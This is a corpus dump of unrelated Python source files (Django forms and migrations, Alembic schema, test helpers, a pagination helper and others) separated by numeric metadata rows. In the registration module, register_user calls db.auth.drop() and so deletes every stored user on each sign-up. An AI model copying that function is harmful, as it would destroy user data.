        # Fix: print() calls instead of Python 2 print statements, so this
        # module parses on both Python 2 and Python 3.
        print('Creating test folder...')
        create_folder_if_not_exist('test_folder')
        assert os.path.exists('test_folder')
        print('Trying to recreate test folder...')
        create_folder_if_not_exist('test_folder')
        assert os.path.exists('test_folder')
    finally:
        # Always remove the scratch folder, even on assertion failure.
        os.removedirs('test_folder')


def test_call_with_superset_args():
    """Extra keys in the arg dict must be ignored when calling the function."""
    def test_fun(a, b):
        return a + b
    args = {'a': 4, 'b': 2, 'c': 'a', 'x': 3}
    assert 6 == call_with_superset_args(test_fun, args)


def test_ensure_dimension_matches():
    """ensure_dimension_matches must zero-pad the smaller array along *axis*
    while leaving the other array untouched, for dense and sparse inputs."""
    A = npr.rand(20, 10)
    B = npr.rand(30, 5)

    AA, BB = ensure_dimension_matches(A, B, axis=0)
    assert AA.shape[0] == BB.shape[0]
    assert_allclose(B, BB)
    assert_allclose(A, AA[:A.shape[0], :])
    assert_allclose(0, AA[A.shape[0]:, :])

    AA, BB = ensure_dimension_matches(A, B, axis=1)
    assert AA.shape[1] == BB.shape[1]
    assert_allclose(A, AA)
    assert_allclose(B, BB[:, :B.shape[1]])
    assert_allclose(0, BB[:, B.shape[1]:])

    # Argument order must not matter.
    BB, AA = ensure_dimension_matches(B, A, axis=0)
    assert AA.shape[0] == BB.shape[0]
    assert_allclose(B, BB)
    assert_allclose(A, AA[:A.shape[0], :])
    assert_allclose(0, AA[A.shape[0]:, :])

    BB, AA = ensure_dimension_matches(B, A, axis=1)
    assert AA.shape[1] == BB.shape[1]
    assert_allclose(A, AA)
    assert_allclose(B, BB[:, :B.shape[1]])
    assert_allclose(0, BB[:, B.shape[1]:])

    # Sparse inputs should behave like their dense counterparts.
    A = sp.rand(20, 10)
    B = sp.rand(30, 5)
    BB, AA = ensure_dimension_matches(B, A, axis=1)
    A, B = A.toarray(), B.toarray()
    AA, BB = AA.toarray(), BB.toarray()
    assert AA.shape[1] == BB.shape[1]
    assert_allclose(A, AA)
    assert_allclose(B, BB[:, :B.shape[1]])
    assert_allclose(0, BB[:, B.shape[1]:])
29.353846
55
0.62631
308
1,908
3.701299
0.198052
0.184211
0.115789
0.105263
0.668421
0.649123
0.649123
0.649123
0.575439
0.52193
0
0.031683
0.205975
1,908
64
56
29.8125
0.720792
0
0
0.5
0
0
0.060797
0
0
0
0
0
0.442308
0
null
null
0.019231
0.096154
null
null
0.038462
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
1
1
0
0
0
0
0
0
0
0
2
de08610cedd78e43d431df85365d4dfba4c47907
4,193
py
Python
users/forms.py
amjadcp/bookingLine-grpA-miniProject
f57fc06f85edfb08f9c170757fddbf7b6de6f35a
[ "PostgreSQL", "Unlicense", "MIT" ]
null
null
null
users/forms.py
amjadcp/bookingLine-grpA-miniProject
f57fc06f85edfb08f9c170757fddbf7b6de6f35a
[ "PostgreSQL", "Unlicense", "MIT" ]
null
null
null
users/forms.py
amjadcp/bookingLine-grpA-miniProject
f57fc06f85edfb08f9c170757fddbf7b6de6f35a
[ "PostgreSQL", "Unlicense", "MIT" ]
null
null
null
from django import forms
from django.contrib.auth.forms import UserCreationForm

from .models import *


def _style_field(field, placeholder=None, name=None):
    """Apply the shared Bootstrap widget attributes to *field*.

    Always sets class="form-control"; adds a placeholder when given, and
    mirrors *name* into both the ``name`` and ``id`` widget attributes.
    Factored out of the (previously copy-pasted) per-field update blocks.
    """
    attrs = {'class': 'form-control'}
    if placeholder is not None:
        attrs['placeholder'] = placeholder
    if name is not None:
        attrs['name'] = name
        attrs['id'] = name
    field.widget.attrs.update(attrs)


class SignupForm(UserCreationForm):
    """User registration form with Bootstrap-styled widgets."""

    class Meta:
        model = User
        fields = ('username', 'first_name', 'last_name', 'email',
                  'password1', 'password2')

    def __init__(self, *args, **kargs):
        super(SignupForm, self).__init__(*args, **kargs)
        # 'username' historically received no name/id attributes —
        # preserved for backward compatibility with existing templates.
        _style_field(self.fields['username'], placeholder='Username')
        for field_name, placeholder in (
                ('first_name', 'First Name'),
                ('last_name', 'Last Name'),
                ('email', 'Email'),
                ('password1', 'Password'),
                ('password2', 'Confirm Password')):
            _style_field(self.fields[field_name], placeholder=placeholder,
                         name=field_name)


class ProfileForm(forms.ModelForm):
    """Profile details form with Bootstrap-styled widgets."""

    # Text fields get a visible placeholder; the file-upload fields
    # ('pdf_adhar', 'pic', 'passbook') get none, matching the original.
    _PLACEHOLDERS = {
        'name': 'Name',
        'phone': 'Phone Number',
        'email': 'Email',
        'adhar': 'Aadhar',
        'address1': 'Address1',
        'address2': 'Address2',
        'district': 'District',
        'state': 'State',
        'pin': 'PIN code',
    }

    class Meta:
        model = Profile
        fields = (
            'name', 'phone', 'email', 'adhar', 'pdf_adhar', 'pic',
            'passbook', 'address1', 'address2', 'district', 'state', 'pin'
        )

    def __init__(self, *args, **kargs):
        super(ProfileForm, self).__init__(*args, **kargs)
        for field_name in self.Meta.fields:
            _style_field(self.fields[field_name],
                         placeholder=self._PLACEHOLDERS.get(field_name),
                         name=field_name)
32.007634
91
0.463153
348
4,193
5.5
0.149425
0.094044
0.159875
0.206897
0.516719
0.516719
0.462382
0.169279
0.094044
0.094044
0
0.006731
0.36227
4,193
131
92
32.007634
0.70905
0
0
0.380165
0
0
0.276824
0
0
0
0
0
0
1
0.016529
false
0.107438
0.024793
0
0.07438
0
0
0
0
null
0
0
1
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
1
0
0
0
0
0
2
a9b208fc8ef5bf90a9d2a6941fa2a45a0eec5410
8,536
py
Python
src/migrations/versions/0930fdefb325_initial_migration.py
vishaltanwar96/Py-iTrack
53fbd73829320337f204f3d03ec667ffa3477592
[ "MIT" ]
4
2020-08-06T11:07:20.000Z
2020-11-20T15:45:13.000Z
src/migrations/versions/0930fdefb325_initial_migration.py
vishaltanwar96/Py-iTrack
53fbd73829320337f204f3d03ec667ffa3477592
[ "MIT" ]
null
null
null
src/migrations/versions/0930fdefb325_initial_migration.py
vishaltanwar96/Py-iTrack
53fbd73829320337f204f3d03ec667ffa3477592
[ "MIT" ]
null
null
null
"""initial migration Revision ID: 0930fdefb325 Revises: Create Date: 2020-09-27 21:13:23.088570 """ from alembic import op import sqlalchemy as sa # revision identifiers, used by Alembic. revision = '0930fdefb325' down_revision = None branch_labels = None depends_on = None def upgrade(): # ### commands auto generated by Alembic - please adjust! ### op.create_table('criticality', sa.Column('id', sa.Integer(), nullable=False), sa.Column('value', sa.String(length=100), nullable=False), sa.PrimaryKeyConstraint('id'), sa.UniqueConstraint('value') ) op.create_table('role', sa.Column('id', sa.Integer(), nullable=False), sa.Column('value', sa.String(length=100), nullable=False), sa.PrimaryKeyConstraint('id'), sa.UniqueConstraint('value') ) op.create_table('status', sa.Column('id', sa.Integer(), nullable=False), sa.Column('value', sa.String(length=100), nullable=False), sa.PrimaryKeyConstraint('id'), sa.UniqueConstraint('value') ) op.create_table('user', sa.Column('id', sa.Integer(), nullable=False), sa.Column('first_name', sa.String(length=30), nullable=False), sa.Column('last_name', sa.String(length=30), nullable=False), sa.Column('email', sa.String(length=200), nullable=False), sa.Column('password', sa.Text(), nullable=False), sa.Column('is_verified', sa.Boolean(), server_default=sa.text('0'), nullable=True), sa.Column('created_at', sa.DateTime(), server_default=sa.text('now()'), nullable=True), sa.Column('role_id', sa.Integer(), nullable=False), sa.ForeignKeyConstraint(['role_id'], ['role.id'], ), sa.PrimaryKeyConstraint('id'), sa.UniqueConstraint('email') ) op.create_table('organisation', sa.Column('id', sa.Integer(), nullable=False), sa.Column('name', sa.String(length=70), nullable=False), sa.Column('passcode', sa.Text(), nullable=False), sa.Column('location', sa.String(length=30), nullable=False), sa.Column('registered_at', sa.DateTime(), server_default=sa.text('now()'), nullable=False), sa.Column('registered_by', sa.Integer(), nullable=False), 
sa.ForeignKeyConstraint(['registered_by'], ['user.id'], ), sa.PrimaryKeyConstraint('id'), sa.UniqueConstraint('name') ) op.create_table('project', sa.Column('id', sa.Integer(), nullable=False), sa.Column('name', sa.String(length=100), nullable=False), sa.Column('description', sa.String(length=255), server_default='', nullable=False), sa.Column('status_id', sa.Integer(), nullable=True), sa.Column('created_at', sa.DateTime(), server_default=sa.text('now()'), nullable=False), sa.Column('organisation_id', sa.Integer(), nullable=True), sa.Column('created_by', sa.Integer(), nullable=False), sa.ForeignKeyConstraint(['created_by'], ['user.id'], ), sa.ForeignKeyConstraint(['organisation_id'], ['organisation.id'], ), sa.ForeignKeyConstraint(['status_id'], ['status.id'], ), sa.PrimaryKeyConstraint('id'), sa.UniqueConstraint('name') ) op.create_table('user_organisation', sa.Column('id', sa.Integer(), nullable=False), sa.Column('user_id', sa.Integer(), nullable=False), sa.Column('organisation_id', sa.Integer(), nullable=False), sa.ForeignKeyConstraint(['organisation_id'], ['organisation.id'], ), sa.ForeignKeyConstraint(['user_id'], ['user.id'], ), sa.PrimaryKeyConstraint('id') ) op.create_table('project_history', sa.Column('remarks', sa.Text(), server_default=sa.text('NULL'), nullable=True), sa.Column('created_at', sa.DateTime(), server_default=sa.text('now()'), nullable=False), sa.Column('id', sa.Integer(), nullable=False), sa.Column('project_id', sa.Integer(), nullable=False), sa.Column('created_by', sa.Integer(), nullable=False), sa.ForeignKeyConstraint(['created_by'], ['user.id'], ), sa.ForeignKeyConstraint(['project_id'], ['project.id'], ), sa.PrimaryKeyConstraint('id') ) op.create_table('task', sa.Column('id', sa.Integer(), nullable=False), sa.Column('name', sa.String(length=200), nullable=False), sa.Column('description', sa.Text(), nullable=False), sa.Column('created_at', sa.DateTime(), server_default=sa.text('now()'), nullable=False), sa.Column('created_by', 
sa.Integer(), nullable=True), sa.Column('assigned_by', sa.Integer(), nullable=True), sa.Column('assigned_to', sa.Integer(), nullable=True), sa.Column('reviewed_by', sa.Integer(), nullable=True), sa.Column('status_id', sa.Integer(), nullable=True), sa.Column('criticality_id', sa.Integer(), nullable=True), sa.Column('expected_completion_date', sa.DateTime(), sa.Computed('created_at + INTERVAL 3 DAY', persisted=True), nullable=False), sa.Column('project_id', sa.Integer(), nullable=True), sa.Column('actual_completion_date', sa.DateTime(), server_default=sa.text('NULL'), nullable=True), sa.ForeignKeyConstraint(['assigned_by'], ['user.id'], ), sa.ForeignKeyConstraint(['assigned_to'], ['user.id'], ), sa.ForeignKeyConstraint(['created_by'], ['user.id'], ), sa.ForeignKeyConstraint(['criticality_id'], ['criticality.id'], ), sa.ForeignKeyConstraint(['project_id'], ['project.id'], ), sa.ForeignKeyConstraint(['reviewed_by'], ['user.id'], ), sa.ForeignKeyConstraint(['status_id'], ['status.id'], ), sa.PrimaryKeyConstraint('id'), sa.UniqueConstraint('name') ) op.create_table('user_project', sa.Column('id', sa.Integer(), nullable=False), sa.Column('user_id', sa.Integer(), nullable=False), sa.Column('project_id', sa.Integer(), nullable=False), sa.ForeignKeyConstraint(['project_id'], ['project.id'], ), sa.ForeignKeyConstraint(['user_id'], ['user.id'], ), sa.PrimaryKeyConstraint('id') ) op.create_table('task_history', sa.Column('remarks', sa.Text(), server_default=sa.text('NULL'), nullable=True), sa.Column('created_at', sa.DateTime(), server_default=sa.text('now()'), nullable=False), sa.Column('id', sa.Integer(), nullable=False), sa.Column('task_id', sa.Integer(), nullable=False), sa.Column('created_by', sa.Integer(), nullable=False), sa.ForeignKeyConstraint(['created_by'], ['user.id'], ), sa.ForeignKeyConstraint(['task_id'], ['task.id'], ), sa.PrimaryKeyConstraint('id') ) # ### end Alembic commands ### def downgrade(): # ### commands auto generated by Alembic - please adjust! 
### op.drop_table('task_history') op.drop_table('user_project') op.drop_table('task') op.drop_table('project_history') op.drop_table('user_organisation') op.drop_table('project') op.drop_table('organisation') op.drop_table('user') op.drop_table('status') op.drop_table('role') op.drop_table('criticality') # ### end Alembic commands ###
55.428571
118
0.534911
841
8,536
5.312723
0.117717
0.100269
0.141003
0.150403
0.794763
0.771486
0.729857
0.689346
0.558863
0.501343
0
0.010974
0.306115
8,536
153
119
55.79085
0.743373
0.033622
0
0.433824
0
0
0.144301
0.005602
0
0
0
0
0
1
0.014706
false
0.014706
0.014706
0
0.029412
0
0
0
0
null
0
0
0
0
1
1
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
2
a9b9a871d28a4764dfb7693ea647326d7012450b
277
py
Python
cyder/cydhcp/workgroup/forms.py
drkitty/cyder
1babc443cc03aa51fa3c1015bcd22f0ea2e5f0f8
[ "BSD-3-Clause" ]
6
2015-04-16T23:18:22.000Z
2020-08-25T22:50:13.000Z
cyder/cydhcp/workgroup/forms.py
drkitty/cyder
1babc443cc03aa51fa3c1015bcd22f0ea2e5f0f8
[ "BSD-3-Clause" ]
267
2015-01-01T00:18:57.000Z
2015-10-14T00:01:13.000Z
cyder/cydhcp/workgroup/forms.py
drkitty/cyder
1babc443cc03aa51fa3c1015bcd22f0ea2e5f0f8
[ "BSD-3-Clause" ]
5
2015-03-23T00:57:09.000Z
2019-09-09T22:42:37.000Z
from django import forms from cyder.base.eav.forms import get_eav_form from cyder.cydhcp.workgroup.models import Workgroup, WorkgroupAV class WorkgroupForm(forms.ModelForm): class Meta: model = Workgroup WorkgroupAVForm = get_eav_form(WorkgroupAV, Workgroup)
19.785714
64
0.787004
35
277
6.114286
0.542857
0.084112
0.093458
0
0
0
0
0
0
0
0
0
0.151625
277
13
65
21.307692
0.910638
0
0
0
0
0
0
0
0
0
0
0
0
1
0
false
0
0.428571
0
0.714286
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
0
1
0
1
0
0
2
a9ba579835c1afe9d5d13cdd3cf78a5b2c2856d9
742
py
Python
Main/migrations/0005_auto_20200809_0710.py
anshumanprajapatiap/django-ecommerce-
49e7c08fc2ddef969986985e1922184950a5ceff
[ "MIT" ]
3
2020-08-11T06:20:56.000Z
2020-10-24T14:25:57.000Z
Main/migrations/0005_auto_20200809_0710.py
anshumanprajapatiap/django-ecommerce
49e7c08fc2ddef969986985e1922184950a5ceff
[ "MIT" ]
null
null
null
Main/migrations/0005_auto_20200809_0710.py
anshumanprajapatiap/django-ecommerce
49e7c08fc2ddef969986985e1922184950a5ceff
[ "MIT" ]
null
null
null
# Generated by Django 3.1 on 2020-08-09 01:40 from django.db import migrations, models class Migration(migrations.Migration): dependencies = [ ('Main', '0004_auto_20200809_0425'), ] operations = [ migrations.AlterField( model_name='address', name='apartment_address', field=models.CharField(max_length=100, null=True), ), migrations.AlterField( model_name='address', name='street_address', field=models.CharField(max_length=100, null=True), ), migrations.AlterField( model_name='address', name='zip', field=models.CharField(max_length=100, null=True), ), ]
25.586207
62
0.578167
75
742
5.573333
0.52
0.143541
0.179426
0.208134
0.607656
0.607656
0.511962
0.511962
0.416268
0.416268
0
0.075875
0.307278
742
28
63
26.5
0.737354
0.057951
0
0.545455
1
0
0.117647
0.032999
0
0
0
0
0
1
0
false
0
0.045455
0
0.181818
0
0
0
0
null
0
0
1
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
1
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
2
a9bc2fb8cc5a87cb535142d90ecf6c0ccf9b146f
1,342
py
Python
vega/algorithms/nas/modnas/optim/model_optim/base.py
This-50m/vega
43602d062331336d854d908ac3066f42b2ea3a92
[ "MIT" ]
724
2020-06-22T12:05:30.000Z
2022-03-31T07:10:54.000Z
vega/algorithms/nas/modnas/optim/model_optim/base.py
NiuRc/vega
52b53582fe7df95d7aacc8425013fd18645d079f
[ "MIT" ]
147
2020-06-30T13:34:46.000Z
2022-03-29T11:30:17.000Z
vega/algorithms/nas/modnas/optim/model_optim/base.py
NiuRc/vega
52b53582fe7df95d7aacc8425013fd18645d079f
[ "MIT" ]
160
2020-06-29T18:27:58.000Z
2022-03-23T08:42:21.000Z
# -*- coding:utf-8 -*- # Copyright (C) 2020. Huawei Technologies Co., Ltd. All rights reserved. # This program is free software; you can redistribute it and/or modify # it under the terms of the MIT License. # This program is distributed in the hope that it will be useful, # but WITHOUT ANY WARRANTY; without even the implied warranty of # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the # MIT License for more details. """Score model optimum finder.""" import random from collections import OrderedDict from typing import Set class ModelOptim(): """Score model optimum finder class.""" def __init__(self, space): self.space = space def get_random_index(self, excludes: Set[int]) -> int: """Return random categorical index from search space.""" index = random.randint(0, self.space.categorical_size() - 1) while index in excludes: index = random.randint(0, self.space.categorical_size() - 1) return index def get_random_params(self, excludes: Set[int]) -> OrderedDict: """Return random categorical parameters from search space.""" return self.space.get_categorical_params(self.get_random_index(excludes)) def get_optimums(self, model, size, excludes): """Return optimums in score model.""" raise NotImplementedError
36.27027
81
0.702683
178
1,342
5.213483
0.488764
0.048491
0.028017
0.049569
0.094828
0.094828
0.094828
0.094828
0.094828
0
0
0.008419
0.203428
1,342
36
82
37.277778
0.859682
0.461252
0
0.133333
0
0
0
0
0
0
0
0
0
1
0.266667
false
0
0.2
0
0.666667
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
1
0
0
0
0
1
0
0
2
a9dc3563ddac75de349c4809af9b6d68dd5964ad
106
py
Python
excript/lista3/q5.py
victorers1/anotacoes_curso_python
c4ef56bcfc7e3baa3944fc2962e8217c6d720b0e
[ "MIT" ]
null
null
null
excript/lista3/q5.py
victorers1/anotacoes_curso_python
c4ef56bcfc7e3baa3944fc2962e8217c6d720b0e
[ "MIT" ]
null
null
null
excript/lista3/q5.py
victorers1/anotacoes_curso_python
c4ef56bcfc7e3baa3944fc2962e8217c6d720b0e
[ "MIT" ]
null
null
null
soma = 0 for i in range(0,101): if(i%2==0): soma+=i print("A soma de todos os pares é:", soma)
21.2
42
0.556604
23
106
2.565217
0.695652
0
0
0
0
0
0
0
0
0
0
0.089744
0.264151
106
5
42
21.2
0.666667
0
0
0
0
0
0.252336
0
0
0
0
0
0
1
0
false
0
0
0
0
0.2
1
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
1
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
2
a9de23120b1f70e9fb79e0ee6eae47eca55547c5
2,054
py
Python
src/RIOT/tests/od/tests/02-run.py
ARte-team/ARte
19f17f57522e1b18ba390718fc94be246451837b
[ "MIT" ]
2
2020-04-30T08:17:45.000Z
2020-05-23T08:46:54.000Z
src/RIOT/tests/od/tests/02-run.py
ARte-team/ARte
19f17f57522e1b18ba390718fc94be246451837b
[ "MIT" ]
null
null
null
src/RIOT/tests/od/tests/02-run.py
ARte-team/ARte
19f17f57522e1b18ba390718fc94be246451837b
[ "MIT" ]
1
2020-02-21T09:21:45.000Z
2020-02-21T09:21:45.000Z
#!/usr/bin/env python3 # Copyright (C) 2017 Hamburg University of Applied Sciences # # This file is subject to the terms and conditions of the GNU Lesser # General Public License v2.1. See the file LICENSE in the top level # directory for more details. import sys from testrunner import run def testfunc(child): child.expect_exact("od_hex_dump(short_str, sizeof(short_str), OD_WIDTH_DEFAULT)") child.expect_exact("00000000 41 42 00 AB.") child.expect_exact("od_hex_dump(long_str, sizeof(long_str), OD_WIDTH_DEFAULT)") child.expect_exact("00000000 FF 2C 61 FF 2E 62 63 64 65 66 67 68 69 6A 6B 6C .,a..bcdefghijkl") child.expect_exact("00000010 6D 6E 6F 70 00 mnop.") child.expect_exact("od_hex_dump(long_str, sizeof(long_str), 4)") child.expect_exact("00000000 FF 2C 61 FF .,a.") child.expect_exact("00000004 2E 62 63 64 .bcd") child.expect_exact("00000008 65 66 67 68 efgh") child.expect_exact("0000000C 69 6A 6B 6C ijkl") child.expect_exact("00000010 6D 6E 6F 70 mnop") child.expect_exact("00000014 00 .") child.expect_exact("od_hex_dump(long_str, sizeof(long_str), 3)") child.expect_exact("00000000 FF 2C 61 .,a") child.expect_exact("00000003 FF 2E 62 ..b") child.expect_exact("00000006 63 64 65 cde") child.expect_exact("00000009 66 67 68 fgh") child.expect_exact("0000000C 69 6A 6B ijk") child.expect_exact("0000000F 6C 6D 6E lmn") child.expect_exact("00000012 6F 70 00 op.") child.expect_exact("od_hex_dump(long_str, sizeof(long_str), 8)") child.expect_exact("00000000 FF 2C 61 FF 2E 62 63 64 .,a..bcd") child.expect_exact("00000008 65 66 67 68 69 6A 6B 6C efghijkl") child.expect_exact("00000010 6D 6E 6F 70 00 mnop.") print("All tests successful") if __name__ == "__main__": sys.exit(run(testfunc, timeout=1))
46.681818
116
0.638267
311
2,054
4.03537
0.366559
0.210359
0.305976
0.071713
0.529084
0.529084
0.509163
0.43745
0.323506
0.267729
0
0.188654
0.261928
2,054
43
117
47.767442
0.639182
0.117332
0
0.066667
0
0.033333
0.561704
0.058661
0
0
0
0
0
1
0.033333
false
0
0.066667
0
0.1
0.033333
0
0
0
null
1
1
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
2
a9df5214be84ff611b6cdee71586384f662371b6
379
py
Python
pytoggl/api/projects_api.py
cloew/pytoggl
ec559e532559bfeaeb0de7f18831d30ed84f5ff1
[ "MIT" ]
null
null
null
pytoggl/api/projects_api.py
cloew/pytoggl
ec559e532559bfeaeb0de7f18831d30ed84f5ff1
[ "MIT" ]
null
null
null
pytoggl/api/projects_api.py
cloew/pytoggl
ec559e532559bfeaeb0de7f18831d30ed84f5ff1
[ "MIT" ]
null
null
null
from .actions import AllFromWorkspaces, Get, WithName from .api_for import api_for from .model_api import ModelApi from ..requests import RequestApis from ..model import Project @api_for(Project, RequestApis.Projects) class ProjectsApi(ModelApi): """ Represents the Toggl Projects API """ all = AllFromWorkspaces() withId = Get() withName = WithName()
31.583333
54
0.733509
44
379
6.227273
0.477273
0.065693
0
0
0
0
0
0
0
0
0
0
0.182058
379
12
55
31.583333
0.883871
0.087071
0
0
0
0
0
0
0
0
0
0
0
1
0
false
0
0.5
0
0.9
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
0
1
0
1
0
0
2
a9e29337adc9d3ccffaa9a42248f46b7b76d1765
480
py
Python
codev/core/log.py
baseclue/codev
7965ffc036ea217e05ca1f566e7b1917c0a67887
[ "Apache-2.0" ]
4
2016-03-21T12:20:52.000Z
2017-02-02T09:08:19.000Z
codev/core/log.py
baseclue/codev
7965ffc036ea217e05ca1f566e7b1917c0a67887
[ "Apache-2.0" ]
null
null
null
codev/core/log.py
baseclue/codev
7965ffc036ea217e05ca1f566e7b1917c0a67887
[ "Apache-2.0" ]
null
null
null
import logging LOGLEVELS = { 'info': logging.INFO, 'debug': logging.DEBUG, } actual_loglevel = 'info' class LoglevelFilter(logging.Filter): def __init__(self, loglevel): self.loglevel = loglevel super().__init__() def filter(self, record): if record.levelno == self.loglevel: return True error_filter = LoglevelFilter(logging.ERROR) info_filter = LoglevelFilter(logging.INFO) debug_filter = LoglevelFilter(logging.DEBUG)
20
44
0.685417
51
480
6.215686
0.392157
0.264984
0.255521
0
0
0
0
0
0
0
0
0
0.20625
480
23
45
20.869565
0.832021
0
0
0
0
0
0.027083
0
0
0
0
0
0
1
0.125
false
0
0.0625
0
0.3125
0
0
0
0
null
1
1
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
2
a9efe50ebc395c79d136c9ed223bd0fa73445f27
189
py
Python
nablapps/poll/apps.py
pettaroni/nablaweb
5e610698a276884b9cd779a718dfdee641713636
[ "MIT" ]
null
null
null
nablapps/poll/apps.py
pettaroni/nablaweb
5e610698a276884b9cd779a718dfdee641713636
[ "MIT" ]
null
null
null
nablapps/poll/apps.py
pettaroni/nablaweb
5e610698a276884b9cd779a718dfdee641713636
[ "MIT" ]
null
null
null
""" App configs for poll app """ from django.apps import AppConfig class PollConfig(AppConfig): """Default poll config""" name = 'nablapps.poll' verbose_name = 'Avstemninger'
17.181818
33
0.687831
22
189
5.863636
0.772727
0
0
0
0
0
0
0
0
0
0
0
0.190476
189
10
34
18.9
0.843137
0.232804
0
0
0
0
0.189394
0
0
0
0
0
0
1
0
false
0
0.25
0
1
0
1
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
1
0
0
2
a9f3f4d963793624fa37eb908b72250431fcb5b9
542
py
Python
app/models/registration.py
bmstu-iu8-g1-2019-project/lingvo-subtitles
23376822725cf5c076783fa03c4d31ae1de14687
[ "MIT" ]
null
null
null
app/models/registration.py
bmstu-iu8-g1-2019-project/lingvo-subtitles
23376822725cf5c076783fa03c4d31ae1de14687
[ "MIT" ]
null
null
null
app/models/registration.py
bmstu-iu8-g1-2019-project/lingvo-subtitles
23376822725cf5c076783fa03c4d31ae1de14687
[ "MIT" ]
null
null
null
from collections import Counter from werkzeug.security import generate_password_hash from app import db def register_user(email, username, password): db.auth.drop() if db.auth.find_one({"username": username}) is not None: return -1 if db.auth.find_one({"email": email}) is not None: return -1 new_user = { "username": username, "email": email, "hashed_password": generate_password_hash(password), "words": Counter() } return db.auth.insert_one(new_user).inserted_id
25.809524
60
0.664207
71
542
4.901408
0.450704
0.068966
0.114943
0.068966
0.178161
0
0
0
0
0
0
0.004773
0.226937
542
20
61
27.1
0.825776
0
0
0.125
1
0
0.084871
0
0
0
0
0
0
1
0.0625
false
0.1875
0.1875
0
0.4375
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
1
0
0
0
null
0
0
0
0
0
0
0
1
0
0
0
0
0
2
a9f79a8550cbe2ffbf9de0e46704c3f19c02a79f
373
py
Python
examples/courseware/shapes.py
LettError/drawbot
dce9af449d429af3f10827654d8b9d3bb8bb8efe
[ "BSD-2-Clause" ]
2
2015-09-17T01:27:02.000Z
2020-11-26T12:07:13.000Z
examples/courseware/shapes.py
LettError/drawbot
dce9af449d429af3f10827654d8b9d3bb8bb8efe
[ "BSD-2-Clause" ]
null
null
null
examples/courseware/shapes.py
LettError/drawbot
dce9af449d429af3f10827654d8b9d3bb8bb8efe
[ "BSD-2-Clause" ]
null
null
null
# draw a rectangle # rect(x, y, width, height) rect(20, 50, 100, 200) rect(130, 50, 100, 200) oval(240, 50, 100, 200) oval(20, 250, 100, 100) oval(130, 250, 100, 100) rect(240, 250, 100, 100) for x in range(20, 300, 50): rect(x, 370, 40, 40) for x in range(20, 300, 50): if random() > 0.5: rect(x, 420, 40, 40) else: oval(x, 420, 40, 40)
16.217391
28
0.557641
72
373
2.888889
0.388889
0.072115
0.115385
0.115385
0.173077
0.173077
0.173077
0
0
0
0
0.376812
0.260054
373
22
29
16.954545
0.376812
0.112601
0
0.153846
0
0
0
0
0
0
0
0
0
1
0
false
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
1
0
0
0
0
0
1
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
2
e70cb8d5f07a65dd29cb11814472b7f5f34cf181
413
py
Python
apps/auth/forms.py
capy-pl/nccu-grade-system
db7107d56e45d535eed92b47c06e0d5c06f983a2
[ "Apache-2.0" ]
2
2019-01-14T17:20:06.000Z
2019-05-06T03:26:23.000Z
apps/auth/forms.py
capy-pl/nccu-grade-system
db7107d56e45d535eed92b47c06e0d5c06f983a2
[ "Apache-2.0" ]
4
2018-12-25T15:06:35.000Z
2019-01-05T08:02:36.000Z
apps/auth/forms.py
capy-pl/nccu-grade-system
db7107d56e45d535eed92b47c06e0d5c06f983a2
[ "Apache-2.0" ]
null
null
null
from django import forms from django.contrib.auth.password_validation import CommonPasswordValidator class ChangePasswordForm(forms.Form): password = forms.CharField(label='密碼', max_length=50, widget=forms.PasswordInput) def clean_password(self): password = self.cleaned_data['password'] validator = CommonPasswordValidator() validator.validate(password) return password
34.416667
85
0.753027
43
413
7.139535
0.651163
0.065147
0
0
0
0
0
0
0
0
0
0.005797
0.164649
413
11
86
37.545455
0.884058
0
0
0
0
0
0.024213
0
0
0
0
0
0
1
0.111111
false
0.888889
0.222222
0
0.666667
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
1
0
0
1
0
0
2
e711e9ffc872c6227dcc744b6182d637eafea65d
759
py
Python
pastetron/pagination.py
kgaughan/pastetron
2f605bedb7a6947a1eb60a1e3f2b63c037e3fe49
[ "MIT" ]
1
2015-09-25T22:11:32.000Z
2015-09-25T22:11:32.000Z
pastetron/pagination.py
kgaughan/pastetron
2f605bedb7a6947a1eb60a1e3f2b63c037e3fe49
[ "MIT" ]
null
null
null
pastetron/pagination.py
kgaughan/pastetron
2f605bedb7a6947a1eb60a1e3f2b63c037e3fe49
[ "MIT" ]
null
null
null
""" Pagination support code. """ BUFFER = 5 def paginator(page_num, max_page, buffer_size=BUFFER): """ Pagination generator. Generates a sequence of page numbers, giving the pages at the beginning and end, and around the current page, with a number of buffer pages on each side of both. Omitted pages in the sequence are elided into a `None`. """ if page_num - buffer_size > 1: yield 1 if page_num - buffer_size > 2: yield None begin = max(1, page_num - buffer_size) end = min(max_page, page_num + buffer_size) for i in xrange(begin, end + 1): yield i if max_page - page_num - buffer_size > 1: yield None if max_page - page_num - buffer_size > 0: yield max_page
26.172414
78
0.648221
117
759
4.042735
0.410256
